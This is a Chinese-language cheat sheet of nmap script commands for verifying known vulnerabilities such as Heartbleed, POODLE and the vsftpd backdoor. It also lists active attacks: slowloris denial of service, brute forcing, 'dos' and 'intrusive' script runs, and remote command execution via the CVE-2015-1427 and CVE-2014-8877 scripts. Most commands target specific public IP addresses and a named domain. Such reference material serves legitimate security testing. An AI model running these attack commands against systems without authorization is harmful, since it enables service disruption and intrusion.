nmap验证检测漏洞命令
- 1 http 拒绝服务
- 2 IIS 短文件泄露
- 3 检测CVE-2011-2523中的ftp-vsftpd-backdoor
- 4 验证HTTP.sys 远程代码执行
- 5验证 SSL POODLE information leak
- 6 验证mysql 匿名访问
- 7 验证cve2015-1427 漏洞
- 8 验证cve2014-8877漏洞
- 9 验证Cisco ASA中的CVE-2014-2126/2127/21/2129漏洞
- 10 验证低安全的 SSHv1,sslv2协议
- 11 验证CVE-2014-0224 ssl-ccs-injection
- 12 验证ssl-cert证书问题
- 13 验证SSL证书的有限期
- 14 验证CVE-2014-0160 OpenSSL Heartbleed bug
- 15 验证 Debian OpenSSL keys
- 16 验证弱加密SSL套件
- 17 验证CVE 2015-4000
- 18 在网络中检测某主机是否存在窃听他人流量
- 19 验证telnet是否支持加密
- 20 精准地确认端口上运行的服务
- 21 收集VNC信息
- 22 使用nmap对某主机进行一系列的证书鉴权检查
- 23 使用nmap在局域网内探查更多服务开启情况
- 24 使用nmap 对常见的服务进行暴力破解
- 25 使用nmap 进行基本的扫描
- 26 使用nmap 进行信息挖掘
- 27 使用nmap 进行拒绝服务攻击
- 28 使用nmap 进行利用第三方的数据库或资源进行信息收集或者攻击
- 29 使用nmap 进行模糊测试,发送异常的包到目标机,探测出潜在漏洞
- 30 使用nmap 进行入侵,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
- 31 使用nmap 探测目标机是否感染了病毒、开启了后门等信息
- 32 使用nmap 对系统进行安全检查
- 33 使用nmap 对目标机进行检查是否存在常见的漏洞
1 http 拒绝服务
nmap --max-parallelism 800–script http-slowloris scanme.nmap.org
2 IIS 短文件泄露
nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176
3 检测CVE-2011-2523中的ftp-vsftpd-backdoor
nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240
4 验证HTTP.sys 远程代码执行
nmap -sV --script http-vuln-cve2015-1635 203.195.139.153
5验证 SSL POODLE information leak
nmap -sV -p 443 --version-light --script ssl-poodle 218.19.141.16
6 验证mysql 匿名访问
nmap --script mysql-empty-password 203.195.139.153
7 验证cve2015-1427 漏洞
nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153
8 验证cve2014-8877漏洞
nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128
9 验证Cisco ASA中的CVE-2014-2126/2127/21/2129漏洞
nmap -p 443 --script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153
10 验证低安全的 SSHv1,sslv2协议
nmap --script sshv1,sslv2 www.haoshangjia.com
11 验证CVE-2014-0224 ssl-ccs-injection
nmap -Pn --script ssl-ccs-injection 203.195.139.153
12 验证ssl-cert证书问题
nmap -v -v --script ssl-cert 203.195.139.153
13 验证SSL证书的有限期
nmap -Pn --script ssl-date www.haoshangjia.com
14 验证CVE-2014-0160 OpenSSL Heartbleed bug
nmap -p 443 --script ssl-heartbleed,ssl-known-key 203.195.139.153
15 验证 Debian OpenSSL keys
nmap -p 443 --script ssl-known-key 203.195.139.153
16 验证弱加密SSL套件
nmap --script ssl-enum-ciphers 203.195.139.153
17 验证CVE 2015-4000
nmap --script ssl-dh-params www.haoshangjia.com
18 在网络中检测某主机是否存在窃听他人流量
nmap --script sniffer-detect 10.10.167.5
19 验证telnet是否支持加密
nmap --script telnet-encryption 203.195.139.153
20 精准地确认端口上运行的服务
nmap -sV --script unusual-port 42.96.170.128
21 收集VNC信息
nmap --script vnc-info 203.195.139.153
22 使用nmap对某主机进行一系列的证书鉴权检查
nmap --script auth 203.195.139.153
23 使用nmap在局域网内探查更多服务开启情况
nmap --script broadcast 10.10.167.6
24 使用nmap 对常见的服务进行暴力破解
nmap --script brute 203.195.139.153
25 使用nmap 进行基本的扫描
nmap --script default 203.195.139.153
#nmap --sC 203.195.139.153
26 使用nmap 进行信息挖掘
nmap --script discovery 203.195.139.153
27 使用nmap 进行拒绝服务攻击
nmap --script dos 203.195.139.153
28 使用nmap 进行利用第三方的数据库或资源进行信息收集或者攻击
nmap --script external 203.195.139.153
29 使用nmap 进行模糊测试,发送异常的包到目标机,探测出潜在漏洞
nmap --script fuzzer 203.195.139.153
30 使用nmap 进行入侵,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
nmap --script intrusive 203.195.139.153
31 使用nmap 探测目标机是否感染了病毒、开启了后门等信息
nmap --script malware 203.195.139.153
32 使用nmap 对系统进行安全检查
nmap --script safe 203.195.139.153
33 使用nmap 对目标机进行检查是否存在常见的漏洞
nmap --script vuln 203.195.139.153